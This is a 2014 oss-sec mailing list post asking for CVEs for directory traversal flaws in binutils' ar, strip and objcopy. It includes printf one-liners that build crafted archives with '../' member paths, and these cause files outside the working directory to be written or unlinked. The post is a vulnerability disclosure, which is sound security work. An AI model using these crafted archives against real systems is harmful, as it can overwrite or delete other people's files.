oss-sec mailing list archives
CVE Request: binutils -- directory traversal
From: Alexander Cherepanov <cherepan () mccme ru>
Date: Wed, 05 Nov 2014 01:34:38 +0300
Hello, it seems binutils don't check paths when extracting files from archives. ---------------------------------------------------------------------- From https://sourceware.org/bugzilla/show_bug.cgi?id=17533#c4 : directory traversal [in ar]:$ printf '!<arch>\n%-48s%-10d`\n../file\n%-48s%-10s`\n' '//' 8 '/0' 0 > test.a
$ ar xv test.a x - ../file From https://sourceware.org/bugzilla/show_bug.cgi?id=17533#c7 : Both absolute and relative paths could be used for the attack. ---------------------------------------------------------------------- From https://sourceware.org/bugzilla/show_bug.cgi?id=17552 : strip and objcopy don't filter out .. components from paths inside archive. Consider an archive created with the following command:$ printf '!<arch>\n%-48s%-10d`\n../file\n%-48s%-10s`\n' '//' 8 '/0' 0 > test.a
then runnig strip/objcopy on it will unlink ./file (e.g. unlink("stq0g2tL/../st4Mtgu4/../file") ).
Consider this:$ printf '!<arch>\n%-48s%-10d`\n../../file\n\n%-48s%-10s`\n' '//' 12 '/0' 0 > test.a
then runnig strip/objcopy on it will unlink ../../file (e.g. unlink("staOxyFW/../../st4KIqLm/../../file") ).
---------------------------------------------------------------------- Could CVEs please be assigned to these issues? -- Alexander Cherepanov
Current thread:
- CVE Request: binutils -- directory traversal Alexander Cherepanov (Nov 04)
- Re: CVE Request: binutils -- directory traversal cve-assign (Nov 12)